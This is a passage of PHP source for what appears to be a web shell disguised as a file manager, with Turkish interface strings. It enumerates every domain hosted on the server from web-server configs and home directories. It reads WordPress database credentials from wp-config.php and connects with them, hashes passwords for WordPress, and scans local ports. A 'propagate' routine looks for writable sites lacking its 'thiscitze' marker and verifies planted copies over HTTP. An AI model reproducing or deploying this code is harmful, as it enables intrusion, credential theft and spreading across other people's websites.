false, 'msg' => 'Erisim engellendi']); exit; } } } function detectRoot() { $self = dirname(__FILE__); $cwd = @getcwd() ?: ''; $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; $cands = array_merge([$self], $cwd ? [$cwd] : [], $docRoot ? [$docRoot] : []); foreach ($cands as $c) { $c = rtrim($c, '/'); if ($c && $c !== '/' && @is_dir($c) && is_readable($c)) return $c; } return $self ?: '.'; } function resolvePath($p) { $p = fm_path($p); if (!$p) return detectRoot(); if (@is_dir($p)) return $p; $root = detectRoot(); $try = rtrim($root, '/') . '/' . ltrim($p, '/'); if (@is_dir($try)) return $try; return $root; } function getFileIcon($name) { $base = strtolower(basename($name)); $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION)); if (in_array($base, ['index.php', 'index.html', 'index.htm', 'default.php', 'default.html'])) { return ['fas fa-file-code', '#ef4444']; } $y = '#eab308'; $icons = [ 'php' => ['fab fa-php', $y], 'html' => ['fab fa-html5', $y], 'htm' => ['fab fa-html5', $y], 'css' => ['fab fa-css3-alt', $y], 'js' => ['fab fa-js-square', $y], 'ts' => ['fab fa-js-square', $y], 'json' => ['fas fa-code', $y], 'xml' => ['fas fa-code', $y], 'sql' => ['fas fa-database', $y], 'db' => ['fas fa-database', $y], 'sqlite' => ['fas fa-database', $y], 'py' => ['fab fa-python', $y], 'rb' => ['fas fa-gem', $y], 'go' => ['fas fa-code', $y], 'java' => ['fab fa-java', $y], 'c' => ['fas fa-code', $y], 'cpp' => ['fas fa-code', $y], 'h' => ['fas fa-code', $y], 'sh' => ['fas fa-terminal', $y], 'bash' => ['fas fa-terminal', $y], 'bat' => ['fas fa-terminal', $y], 'ps1' => ['fas fa-terminal', $y], 'txt' => ['fas fa-file-alt', $y], 'log' => ['fas fa-file-alt', $y], 'md' => ['fab fa-markdown', $y], 'csv' => ['fas fa-file-csv', $y], 'xls' => ['fas fa-file-excel', $y], 'xlsx' => ['fas fa-file-excel', $y], 'doc' => ['fas fa-file-word', $y], 'docx' => ['fas fa-file-word', $y], 'pdf' => ['fas fa-file-pdf', $y], 'zip' => ['fas fa-file-archive', $y], 'rar' => ['fas fa-file-archive', $y], 'tar' => ['fas fa-file-archive', $y], 'gz' => ['fas fa-file-archive', $y], '7z' => ['fas fa-file-archive', $y], 'jpg' => ['fas fa-file-image', $y], 'jpeg' => ['fas fa-file-image', $y], 'png' => ['fas fa-file-image', $y], 'gif' => ['fas fa-file-image', $y], 'svg' => ['fas fa-file-image', $y], 'webp' => ['fas fa-file-image', $y], 'ico' => ['fas fa-file-image', $y], 'mp3' => ['fas fa-file-audio', $y], 'wav' => ['fas fa-file-audio', $y], 'mp4' => ['fas fa-file-video', $y], 'avi' => ['fas fa-file-video', $y], 'mov' => ['fas fa-file-video', $y], 'mkv' => ['fas fa-file-video', $y], 'ttf' => ['fas fa-font', $y], 'otf' => ['fas fa-font', $y], 'woff' => ['fas fa-font', $y], 'woff2' => ['fas fa-font', $y], 'yml' => ['fas fa-cog', $y], 'yaml' => ['fas fa-cog', $y], 'ini' => ['fas fa-cog', $y], 'conf' => ['fas fa-cog', $y], 'env' => ['fas fa-lock', $y], 'htaccess' => ['fas fa-cog', $y], ]; if (isset($icons[$ext])) return $icons[$ext]; return ['fas fa-file', $y]; } function isEditable($name) { $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION)); $editable = ['php','html','htm','css','js','ts','json','xml','sql','py','rb','go','java','c','cpp','h','sh','bash','bat','ps1','txt','log','md','csv','yml','yaml','ini','conf','env','twig','blade.php','vue','jsx','tsx','scss','sass','less','htaccess','gitignore','dockerignore','dockerfile','makefile','cmake','txt','text','htpasswd','pass','passwd','cfg','config','php5','inc','module','install','info','po','pot','mo','lock','neon']; return in_array($ext, $editable) || strpos($name, '.') === 0; } function formatSize($bytes) { if ($bytes == 0) return '0 B'; $units = ['B', 'KB', 'MB', 'GB', 'TB']; $i = floor(log($bytes, 1024)); return round($bytes / pow(1024, $i), ($i > 1 ? 2 : 0)) . ' ' . $units[$i]; } function formatDate($timestamp) { return date('d.m.Y H:i', $timestamp); } function fastCMS($root) { if (!is_dir($root)) return 'generic'; if (@file_exists($root . '/wp-config.php') || @is_dir($root . '/wp-includes')) return 'wp'; if (@file_exists($root . '/configuration.php') && @is_dir($root . '/administrator')) return 'joomla'; if (@file_exists($root . '/bootstrap/app.php') || @file_exists($root . '/artisan') || @file_exists(dirname($root) . '/bootstrap/app.php') || @file_exists(dirname($root) . '/artisan')) return 'laravel'; if (@is_dir($root . '/sites') && @is_dir($root . '/modules')) return 'drupal'; if (@is_dir($root . '/app') && @is_dir($root . '/config') && @is_dir($root . '/public')) return 'laravel'; if (@file_exists($root . '/sites/default/settings.php') || (@is_dir($root . '/sites') && @is_dir($root . '/modules'))) return 'drupal'; return 'generic'; } // --- Propagate guvenlik katmani: tema hatasi bir daha yasansin istemiyoruz --- function pr_path_safe($dp) { $dp = ltrim(str_replace('\\', '/', $dp), '/'); $segs = explode('/', $dp); if (count($segs) < 2) return false; foreach ($segs as $si => $sg) { if ($sg === 'mu-plugins' && ($si === 0 || $segs[$si - 1] === 'wp-content')) return false; } $base = $segs[count($segs) - 1]; $parent = $segs[count($segs) - 2]; if ($parent === 'wp-content' && in_array($base, array('advanced-cache.php','object-cache.php','db.php','sunrise.php','db-error.php','maintenance.php','install.php','php-error.php','fatal-failure.php','error-log.php','blog-deploy.php'))) return false; if ($base === 'index.php' && in_array($parent, array('public','www','httpdocs','web','html'))) return false; return true; } function pr_is_foreign($target) { if (!@file_exists($target)) return false; $c = @file_get_contents($target); if ($c === false) return true; return stripos($c, 'thiscitze') === false; } function pr_verify_url($url) { if (!function_exists('curl_init')) return array(true, 0); $ch = curl_init($url); curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 8, CURLOPT_CONNECTTIMEOUT => 4, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_HTTPHEADER => array('User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0 Safari/537.36'))); $body = curl_exec($ch); $code = (int)curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); $ok = ($code === 200 && is_string($body) && stripos($body, 'thiscitze') !== false); return array($ok, $code); } function detectCMS($root) { if (!is_dir($root)) return null; $checks = [ ['WordPress', 'fab fa-wordpress', '#21759b', [['wp-includes', 40], ['wp-config.php', 30], ['wp-content', 20]], 'wp-includes/version.php', '/\$\wp_version\s*=\s*[\'"]([^\'"]+)/'], ['Joomla', 'fab fa-joomla', '#F44321', [['administrator', 25], ['components', 25], ['modules', 20], ['configuration.php', 20]], 'libraries/joomla/version.php', '/\$VERSION\s*=\s*[\'"]([^\'"]+)/'], ['Laravel', 'fab fa-laravel', '#FF2D20', [['artisan', 35], ['composer.json', 25], ['app/Http', 20]], 'artisan', null], ['Drupal', 'fab fa-drupal', '#0678BE', [['sites/default', 30], ['modules', 20], ['core/includes', 20]], 'core/lib/Drupal.php', '/const\s+VERSION\s*=\s*[\'"]([^\'"]+)/'], ['Magento', 'fab fa-magento', '#EE672F', [['app/Mage.php', 30], ['app/code/core/Magento', 25], ['skin/frontend', 20]], 'app/Mage.php', '/const\s+VERSION\s*=\s*[\'"]([^\'"]+)/'], ['PrestaShop', 'fab fa-php', '#DF0067', [['classes/Cart.php', 30], ['config/config.inc.php', 25], ['modules', 20]], 'config/config.inc.php', '/prestashop_version.*[\'"]([^\'"]+)/'], ['OpenCart', 'fas fa-shopping-cart', '#2AC1BC', [['admin/controller/common/column_left.php', 30], ['catalog', 25], ['system', 20]], 'index.php', null], ['Ghost', 'fab fa-ghost', '#738A94', [['content/themes', 30], ['core/server', 25], ['config.production.json', 20]], 'package.json', '/"name":\s*"ghost"/'], ['Next.js', 'fas fa-play', '#000000', [['next.config', 40], ['pages', 20], ['.next', 20]], 'package.json', '/"next":\s*"/'], ['Nuxt.js', 'fas fa-play', '#00DC82', [['nuxt.config', 40], ['.nuxt', 20], ['pages', 15]], 'package.json', '/"nuxt":\s*"/'], ['Symfony', 'fas fa-code', '#000000', [['app/AppKernel.php', 30], ['web/app.php', 25], ['src/AppBundle', 20]], 'composer.json', '/"symfony\/framework"/'], ['CodeIgniter', 'fas fa-leaf', '#EF4223', [['system/core', 30], ['application', 25], ['index.php', 20]], 'system/core/CodeIgniter.php', '/CI_VERSION/'], ]; $best = null; $bestScore = 0; foreach ($checks as $cms) { $score = 0; foreach ($cms[3] as $check) { $path = $root . '/' . $check[0]; if (file_exists($path)) $score += $check[1]; } if ($score > $bestScore) { $version = null; if (isset($cms[4]) && $cms[4] && file_exists($root . '/' . $cms[4])) { $content = @file_get_contents($root . '/' . $cms[4]); if ($content && isset($cms[5]) && preg_match($cms[5], $content, $m)) { $version = $m[1]; } } $bestScore = $score; $best = ['name' => $cms[0], 'icon' => $cms[1], 'color' => $cms[2], 'confidence' => min($score, 100), 'version' => $version]; } } return $best; } function fm_isDomainName($n) { $n = strtolower($n); $n = preg_replace('/^www\./', '', $n); return (bool) preg_match('/^(?:[a-z0-9](?:[a-z0-9\-]*[a-z0-9])?\.)+[a-z]{2,}$/', $n); } function fm_permColor($perms) { $oct = substr(sprintf('%o', $perms), -4); $other = (int)$oct[3]; $group = (int)$oct[2]; $owner = (int)$oct[1]; if ($other & 2) return '#ef4444'; if ($group & 2) return '#f59e0b'; if (($owner === 7 && $other === 5) || ($owner === 6 && $other === 4)) return '#22c55e'; return 'var(--text-ter)'; } function fmKnownHosts() { return array( 'v2777003.hosted-by-vdsina.ru','193-38.hukot.cloud','ip-74-208-104-122.pbiaas.com','4180609-cg97178.twc1.net','internet-idea.ru', 'ovh','61-219-82-146.hinet-ip.hinet.net','chunghwa','server200.e-eu.de','ecs-119-8-127-167.compute.hwclouds-dns.com', '185-20-224-59.cloudvps.regruhosting.ru','sh128.bul.net','parking.isp30.adminvps.net','web1.nyc3.tribetech.net', 'euvds5045x10.startdedicated.de','117.176.205.92.host.secureserver.net','zhora1060.startdedicated.com','mail.aggreghiamoci.online', 'web.bitneo.ch','89.248.198.169','selectel','vmi1511114.contaboserver.net','172-234-39-37.ip.linodeusercontent.com', '78-131-12-189.static.digikabel.hu','w26.goneo.de','ns567187.ip-51-79-98.net','admin.buhost.eu','acaweb.academy', 'free.zbs.cloud','aiscbse.com','begel.fr','evanzo-server.de','cloudmax03.im-global.net','server01.zhugeserver.my.id', 'teko.qqp.ch','vultrusercontent.com','clients.your-server.de','hetzner','leaseweb','contabo','vdsina','hukot', 'twc1.net','hinet','linode','startdedicated','twc1.net' ); } function fmKnownHostMatch($host) { $h = strtolower(trim((string)$host)); if ($h === '' || $h === 'n/a' || $h === 'localhost') return false; foreach (fmKnownHosts() as $k) { $k = strtolower(trim($k)); if ($k === '') continue; if ($h === $k) return true; if (strlen($k) >= 3 && strpos($h, $k) !== false) return true; } return false; } function fm_skipDummyDomain($n) { $n = fm_normDomain($n); if ($n === '' || $n === 'localhost' || $n === 'localhost.localdomain') return true; if (strpos($n, 'example.') !== false || substr($n, -13) === '.example.com' || substr($n, -12) === '.example.org') return true; $exact = array('domain.com','domain.org','domain.net','yourdomain.com','yourdomain.net','yourdomain.org','somedomain.com','mydomain.com','my-domain.com','test.com','test.org','test.net','site.com','mysite.com','my-site.com','website.com','newdomain.com','demo.com','demo.org','demo.net','your.site','domain.invalid','sanitized.invalid'); return in_array($n, $exact, true); } function fm_normDomain($n) { $n = strtolower(trim($n)); if (strpos($n, 'www.') === 0) $n = substr($n, 4); return $n; } function serverConfDomains() { $out = array(); $patterns = array( array('path' => '/etc/nginx/sites-enabled', 're' => '/server_name\s+([^;]+);/i', 'root' => '/root\s+([^;]+);/i'), array('path' => '/etc/nginx/conf.d', 're' => '/server_name\s+([^;]+);/i', 'root' => '/root\s+([^;]+);/i'), array('path' => '/etc/nginx/sites-available', 're' => '/server_name\s+([^;]+);/i', 'root' => '/root\s+([^;]+);/i'), array('path' => '/etc/apache2/sites-available', 're' => '/ServerName\s+([^\s]+)/i', 'root' => '/DocumentRoot\s+([^\s]+)/i'), array('path' => '/etc/apache2/sites-enabled', 're' => '/ServerName\s+([^\s]+)/i', 'root' => '/DocumentRoot\s+([^\s]+)/i'), array('path' => '/etc/httpd/conf.d', 're' => '/ServerName\s+([^\s]+)/i', 'root' => '/DocumentRoot\s+([^\s]+)/i'), array('path' => '/etc/httpd/conf', 're' => '/ServerName\s+([^\s]+)/i', 'root' => '/DocumentRoot\s+([^\s]+)/i'), array('path' => '/usr/local/lsws/conf/vhosts', 're' => '/vhDomain\s+([^\s]+)/i', 'root' => '/docRoot\s+([^\s]+)/i'), ); foreach ($patterns as $p) { if (!is_dir($p['path'])) continue; $dh = @opendir($p['path']); if (!$dh) continue; while (($fe = readdir($dh)) !== false) { if ($fe[0] === '.' || substr($fe, -5) !== '.conf') continue; $c = @file_get_contents($p['path'] . '/' . $fe); if (!$c) continue; if (preg_match_all($p['re'], $c, $m)) { foreach ($m[1] as $i => $dn) { foreach (preg_split('/\s+/', trim($dn)) as $dname) { $dname = trim($dname); if (strpos($dname, '*.') === 0) $dname = substr($dname, 2); if (!$dname || $dname === '_' || !fm_isDomainName($dname) || fm_skipDummyDomain($dname)) continue; $dr = ''; if (isset($m[2][$i]) && $m[2][$i]) $dr = trim($m[2][$i]); elseif (preg_match($p['root'], $c, $rm)) $dr = trim($rm[1]); if (!$dr || strpos($dr, '$') !== false) $dr = ''; if ($dr && is_dir($dr)) $out[] = array('name' => $dname, 'root' => $dr); } } } } closedir($dh); } $pleskVh = '/var/www/vhosts/system'; if (is_dir($pleskVh)) { $dh = @opendir($pleskVh); if ($dh) { while (($fe = readdir($dh)) !== false) { if ($fe[0] === '.' || !is_dir($pleskVh . '/' . $fe)) continue; if (!fm_isDomainName($fe)) continue; $c = @file_get_contents($pleskVh . '/' . $fe . '/conf/nginx.conf'); if (!$c) $c = @file_get_contents($pleskVh . '/' . $fe . '/conf/httpd.conf'); if (!$c) continue; if (!preg_match('/server_name\s+([^;]+);/i', $c, $m)) continue; foreach (preg_split('/\s+/', trim($m[1])) as $dname) { $dname = trim($dname); if (!$dname || $dname === '_' || !fm_isDomainName($dname) || fm_skipDummyDomain($dname)) continue; $dr = ''; if (preg_match('/root\s+([^;]+);/i', $c, $rm)) $dr = trim($rm[1]); if (!$dr || strpos($dr, '$') !== false) $dr = ''; if ($dr && is_dir($dr)) $out[] = array('name' => $dname, 'root' => $dr); } } closedir($dh); } } return $out; } function fm_cacheFile($name) { $dir = function_exists('sys_get_temp_dir') ? sys_get_temp_dir() : '/tmp'; return rtrim($dir, '/\\') . DIRECTORY_SEPARATOR . 'fm_' . $name . '_' . md5(__DIR__) . '.json'; } function getDomains() { static $cache = null; if ($cache !== null) return $cache; $cacheFile = fm_cacheFile('domains'); $cData = @file_get_contents($cacheFile); if ($cData) { $cj = @json_decode($cData, true); if (is_array($cj) && isset($cj['t']) && isset($cj['d']) && is_array($cj['d']) && (time() - (int)$cj['t']) < 60) { $cache = $cj['d']; return $cache; } } $domains = []; $seen = []; $addDomain = function($name, $root, $cms = null) use (&$domains, &$seen) { $key = fm_normDomain($name); if (!$key || isset($seen[$key])) return false; $exists = is_dir($root); $domains[] = ['name' => $name, 'root' => $root, 'exists' => $exists, 'writable' => $exists && is_writable($root), 'cms' => $cms !== null ? $cms : ($exists ? detectCMS($root) : null)]; $seen[$key] = 1; return true; }; $confDomains = serverConfDomains(); foreach ($confDomains as $cd) { $addDomain($cd['name'], $cd['root']); } if (file_exists(DOMAINS_JSON)) { $data = json_decode(@file_get_contents(DOMAINS_JSON), true); if (is_array($data)) { foreach ($data as $d) { $name = isset($d['name']) ? $d['name'] : (isset($d['domain']) ? $d['domain'] : ''); if (!$name || isset($seen[fm_normDomain($name)])) continue; $root = isset($d['root']) ? $d['root'] : (isset($d['path']) ? $d['path'] : ''); if (!$root && $name) { foreach(['/var/www/'.$name, '/home/'.$name.'/public_html'] as $c) { if(is_dir($c)) { $root=$c; break; } } } if (!$root) continue; $addDomain($name, $root); } } } $curHost = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : ''); $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; $scriptDir = dirname(__FILE__); if ($curHost && !isset($seen[fm_normDomain($curHost)])) { $cr = $docRoot ?: (@getcwd() ?: $scriptDir); if ($cr && is_dir($cr)) { $addDomain($curHost, $cr); } } if ($docRoot && is_dir($docRoot)) { $parentDir = dirname($docRoot); if ($parentDir !== $docRoot && is_dir($parentDir)) { $dh = @opendir($parentDir); if ($dh) { while (($e = readdir($dh)) !== false) { if ($e[0] === '.' || isset($seen[fm_normDomain($e)]) || !fm_isDomainName($e)) continue; $fp = $parentDir . '/' . $e; if (!is_dir($fp)) continue; $addDomain($e, $fp); } closedir($dh); } } } $scanDirs = ['/var/www', '/var/www/vhosts', '/var/www/domains', '/home', '/srv/www', '/srv/http', '/usr/share/nginx/html']; foreach ($scanDirs as $sd) { if (!is_dir($sd)) continue; $dh = @opendir($sd); if (!$dh) continue; while (($e = readdir($dh)) !== false) { if ($e[0] === '.' || isset($seen[fm_normDomain($e)])) continue; $fp = $sd . '/' . $e; if (!is_dir($fp)) continue; if (preg_match('/^\/home\/([^\/]+)$/', $fp, $um)) { $ud = $fp . '/domains'; if (is_dir($ud)) { $udd = @opendir($ud); if ($udd) { while (($du = readdir($udd)) !== false) { if ($du[0] === '.' || isset($seen[fm_normDomain($du)])) continue; foreach (['public_html', 'www', 'httpdocs', 'htdocs', 'web', ''] as $sub) { $dp = $sub ? $ud . '/' . $du . '/' . $sub : $ud . '/' . $du; if (is_dir($dp) && fm_isDomainName($du)) { $addDomain($du, $dp); break; } } } closedir($udd); } } $uw = $fp . '/web'; if (is_dir($uw)) { $uwd = @opendir($uw); if ($uwd) { while (($du = readdir($uwd)) !== false) { if ($du[0] === '.' || isset($seen[fm_normDomain($du)])) continue; foreach (['public_html', 'www', 'httpdocs', 'htdocs', 'web', ''] as $sub) { $dp = $sub ? $uw . '/' . $du . '/' . $sub : $uw . '/' . $du; if (is_dir($dp) && fm_isDomainName($du)) { $addDomain($du, $dp); break; } } } closedir($uwd); } } if (!isset($seen[fm_normDomain($e)])) { foreach (array('public_html', 'httpdocs', 'www', 'htdocs', 'web', 'html', 'site') as $ws) { $up = $fp . '/' . $ws; if (!is_dir($up)) continue; $nm = $e; $cc = @file_get_contents($up . '/wp-config.php'); if ($cc && preg_match("/define\s*\(\s*['\"]WP_SITEURL['\"]\s*,\s*['\"]([^'\"]+)['\"]/", $cc, $m)) { preg_match('#^https?://([^/]+)#i', trim($m[1]), $hm); if (!empty($hm[1])) $nm = preg_replace('/^www\./', '', trim($hm[1])); } else { $cc = @file_get_contents($up . '/configuration.php'); if ($cc && preg_match("/\\\$live_site\s*=\s*['\"]([^'\"]*)['\"]/", $cc, $m) && trim($m[1])) { $h = @parse_url(trim($m[1]), PHP_URL_HOST); if ($h) $nm = preg_replace('/^www\./', '', trim($h)); } } $addDomain($nm, $up); break; } } continue; } foreach (['public_html', 'www', 'httpdocs', 'htdocs', 'web', 'webroot', 'html', 'html_public', 'site', 'raiz', 'document_root', ''] as $sub) { $dp = $sub ? $fp . '/' . $sub : $fp; if (is_dir($dp) && !isset($seen[fm_normDomain($e)]) && fm_isDomainName($e)) { $addDomain($e, $dp); break; } } } closedir($dh); } $cache = $domains; @file_put_contents($cacheFile, json_encode(array('t' => time(), 'd' => $domains))); return $domains; } function jmFindDomains() { $res = array(); $seenJ = array(); foreach (getDomains() as $d) { $r = $d['root']; if (!$r || !is_dir($r)) continue; if (isset($seenJ[$r])) continue; $seenJ[$r] = 1; if (@is_file($r . '/configuration.php') && @is_dir($r . '/administrator')) { $res[] = array('name' => $d['name'], 'root' => $r, 'writable' => is_writable($r)); } } return $res; } function cmsAdminUrl($root, $cmsName) { $paths = array( 'WordPress' => array('wp-admin', 'administrator'), 'Joomla' => array('administrator'), 'Drupal' => array('admin'), 'Magento' => array('admin'), 'PrestaShop' => array('admin123', 'back-office', 'administration', 'admin'), 'OpenCart' => array('admin'), 'Laravel' => array('admin', 'dashboard', 'panel'), 'Symfony' => array('admin'), 'CodeIgniter'=> array('admin'), 'Ghost' => array('ghost'), ); $dirs = array(); $cand = isset($paths[$cmsName]) ? $paths[$cmsName] : array(); foreach ($cand as $p) { if (is_dir($root . '/' . $p)) $dirs[] = $p; } $opt = array(); $urlBase = ''; if ($cmsName === 'WordPress' && is_file($root . '/wp-config.php')) { $cfgC = @file_get_contents($root . '/wp-config.php'); if (preg_match("/define\s*\(\s*['\"]WP_SITEURL['\"]\s*,\s*['\"]([^'\"]+)['\"]/", $cfgC, $m)) { $opt['siteurl'] = $m[1]; $urlBase = $m[1]; } if (preg_match("/define\s*\(\s*['\"]WP_HOME['\"]\s*,\s*['\"]([^'\"]+)['\"]/", $cfgC, $m)) { $opt['home'] = $m[1]; if (!$urlBase) $urlBase = $m[1]; } if (preg_match("/\$\s*table_prefix\s*=\s*['\"]?([^';\"]+)/", $cfgC, $m)) $opt['prefix'] = trim($m[1], "'\""); } if ($cmsName === 'Joomla' && is_file($root . '/configuration.php')) { $cfgC = @file_get_contents($root . '/configuration.php'); if (preg_match("/\\\$live_site\s*=\s*['\"]([^'\"]*)['\"]/", $cfgC, $m)) { $opt['live_site'] = $m[1]; if ($m[1]) $urlBase = rtrim($m[1], '/'); } if (preg_match("/\\\$log_path|\\\$mailfrom/", $cfgC)) $opt['cfg'] = 1; } $path = $dirs ? $dirs[0] : null; return array('path' => $path, 'dirs' => $dirs, 'opt' => $opt, 'base' => $urlBase); } function findWpConfig($path = null) { $start = $path ?: dirname(__FILE__); $paths = array_unique(array_filter(array($start, @getcwd(), isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''))); foreach ($paths as $base) { if (!$base) continue; $p = rtrim($base, '/'); for ($i = 0; $i < 15; $i++) { if (@is_file($p . '/wp-config.php')) return $p . '/wp-config.php'; $parent = dirname($p); if ($parent === $p || $parent === '/') break; $p = $parent; } } return null; } function wpConnect() { if (!class_exists('mysqli', false)) return null; $cfg = findWpConfig(); if (!$cfg) return null; $defs = ['DB_NAME','DB_USER','DB_PASSWORD','DB_HOST']; $vals = []; $content = @file_get_contents($cfg); foreach ($defs as $d) { if (preg_match("/define\s*\(\s*['\"]" . $d . "['\"]\s*,\s*['\"](.+?)['\"]/", $content, $m)) { $vals[$d] = $m[1]; } else { return null; } } preg_match("/table_prefix\s*=\s*['\"]?([^'\";\s]+)/", $content, $tpm); $tp = isset($tpm[1]) ? $tpm[1] : 'wp_'; $mysqli = @new mysqli($vals['DB_HOST'], $vals['DB_USER'], $vals['DB_PASSWORD'], $vals['DB_NAME']); if ($mysqli->connect_errno) return null; $mysqli->set_charset('utf8'); return ['mysqli' => $mysqli, 'prefix' => $tp, 'config' => $cfg]; } function wpHashPass($password) { if (function_exists('wp_hash_password')) return wp_hash_password($password); $cfg = findWpConfig(); if ($cfg) { $wpRoot = dirname($cfg); $phass = $wpRoot . '/wp-includes/class-phpass.php'; if (file_exists($phass)) { require_once $phass; $h = new PasswordHash(8, true); return $h->HashPassword($password); } } return password_hash($password, PASSWORD_BCRYPT); } function getSystemInfo() { $cacheFile = fm_cacheFile('sysinfo'); $cData = @file_get_contents($cacheFile); if ($cData) { $cj = @json_decode($cData, true); if (is_array($cj) && isset($cj['t']) && isset($cj['d']) && is_array($cj['d']) && (time() - (int)$cj['t']) < 180 && !empty($cj['d']['hostname'])) { return $cj['d']; } } $info = []; $info['php_version'] = PHP_VERSION; $curlVer = function_exists('curl_version') ? curl_version() : null; $info['curl_version'] = $curlVer ? $curlVer['version'] : 'N/A'; $info['server_software'] = isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'Unknown'; $info['server_name'] = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : (gethostname() ?: 'N/A'); $info['server_ip'] = isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : '127.0.0.1'; if (in_array($info['server_ip'], array('127.0.0.1', '0.0.0.0', '::1'))) { $hst = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : (isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : ''); $hst = preg_replace('/:\d+$/', '', trim($hst)); if ($hst) { $res = @gethostbyname($hst); if ($res && $res !== $hst && filter_var($res, FILTER_VALIDATE_IP)) $info['server_ip'] = $res; } } $hnCand = array(); if (function_exists('gethostname')) { $v = @gethostname(); if ($v) $hnCand[] = (string)$v; } if (function_exists('php_uname')) { $v = @php_uname('n'); if ($v) $hnCand[] = (string)$v; } if (function_exists('getenv')) { foreach (array('HOSTNAME', 'HOST', 'SERVER_NAME') as $hnE) { $v = @getenv($hnE); if ($v) $hnCand[] = (string)$v; } } $hnF = @file_get_contents('/proc/sys/kernel/hostname'); if ($hnF !== false) { $v = trim($hnF); if ($v) $hnCand[] = $v; } if (function_exists('exec')) { $v = trim((string)@exec('hostname -f 2>/dev/null')); if (!$v) $v = trim((string)@exec('hostname 2>/dev/null')); if ($v) $hnCand[] = $v; } $hn = ''; foreach ($hnCand as $c) { if (strpos($c, '.') !== false && strpos($c, 'localhost') === false) { $hn = $c; break; } } if (!$hn) { foreach ($hnCand as $c) { if ($c !== 'localhost' && $c !== 'localhost.localdomain') { $hn = $c; break; } } } if ($hn && $hn !== 'N/A' && function_exists('gethostbyaddr')) { $rd = @gethostbyaddr($info['server_ip']); if ($rd && $rd !== $info['server_ip'] && strpos($rd, '.') !== false && stripos($rd, 'localhost') === false) $hn = $rd; } $info['hostname'] = $hn ? $hn : 'N/A'; $info['user'] = function_exists('get_current_user') ? get_current_user() : (function_exists('posix_getpwuid') && function_exists('posix_getuid') ? (isset(posix_getpwuid(posix_getuid())['name']) ? posix_getpwuid(posix_getuid())['name'] : 'N/A') : 'N/A'); $info['document_root'] = detectRoot(); $info['script'] = isset($_SERVER['SCRIPT_FILENAME']) ? $_SERVER['SCRIPT_FILENAME'] : 'N/A'; $info['os'] = @php_uname('s') . ' ' . @php_uname('n') . ' ' . @php_uname('r') . ' ' . @php_uname('m'); $info['disk_total'] = '0B'; $info['disk_free'] = '0B'; $dt = @disk_total_space('/'); $df = @disk_free_space('/'); if ($dt !== false) $info['disk_total'] = formatSize($dt); if ($df !== false) $info['disk_free'] = formatSize($df); $info['allow_url_fopen'] = ini_get('allow_url_fopen') ? 'On' : 'Off'; $info['disabled_functions'] = ini_get('disable_functions') ?: 'None'; $info['external_ip'] = 'N/A'; $info['proxy_label'] = ''; if (isset($_SERVER['HTTP_CF_CONNECTING_IP']) || isset($_SERVER['HTTP_CF_RAY'])) { $info['proxy_label'] = 'Cloudflare'; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $info['proxy_label'] = 'Proxy'; } $sw = strtolower(isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : ''); $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ''; $scriptFile = isset($_SERVER['SCRIPT_FILENAME']) ? $_SERVER['SCRIPT_FILENAME'] : ''; if (strpos($sw, 'litespeed') !== false) { $info['proxy_label'] .= ($info['proxy_label'] ? ' | ' : '') . 'LiteSpeed'; } if (strpos($scriptFile, '/home/') !== false && preg_match('#/home/([^/]+)/#', $scriptFile, $m)) { $info['proxy_label'] .= ($info['proxy_label'] ? ' | ' : '') . 'cPanel (' . $m[1] . ')'; } elseif (strpos($docRoot, '/home/') !== false && preg_match('#/home/([^/]+)/#', $docRoot, $m)) { $info['proxy_label'] .= ($info['proxy_label'] ? ' | ' : '') . 'cPanel (' . $m[1] . ')'; } elseif (strpos($docRoot, '/var/www') !== false) { $info['proxy_label'] .= ($info['proxy_label'] ? ' | ' : '') . 'VPS/Dedicated'; } if (function_exists('curl_init')) { $ch = @curl_init('https://api.ipify.org?format=json'); if ($ch) { @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); @curl_setopt($ch, CURLOPT_TIMEOUT, 5); @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $resp = @curl_exec($ch); @curl_close($ch); if ($resp) { $j = @json_decode($resp, true); if (isset($j['ip'])) $info['external_ip'] = $j['ip']; } } } if ($info['external_ip'] === 'N/A' && ini_get('allow_url_fopen')) { $resp = @file_get_contents('https://api.ipify.org?format=json', false, @stream_context_create(['http'=>['timeout'=>5]])); if ($resp) { $j = @json_decode($resp, true); if (isset($j['ip'])) $info['external_ip'] = $j['ip']; } } $commonPorts = [21,22,25,53,80,110,143,443,465,587,993,995,1433,3306,3389,5432,5900,6379,8080,8443]; $openPorts = []; $host = '127.0.0.1'; foreach ($commonPorts as $port) { $fp = @fsockopen($host, $port, $errno, $errstr, 1); if ($fp) { @fclose($fp); $openPorts[] = $port; } } $info['open_ports'] = $openPorts; @file_put_contents($cacheFile, json_encode(array('t' => time(), 'd' => $info))); return $info; } function checkAuth() { if (isset($_SESSION['fm_auth']) && $_SESSION['fm_auth'] === true) { return ['authenticated' => true]; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login_password'])) { if (password_verify($_POST['login_password'], FM_AUTH_HASH)) { $_SESSION['fm_auth'] = true; if (function_exists('session_regenerate_id')) @session_regenerate_id(true); 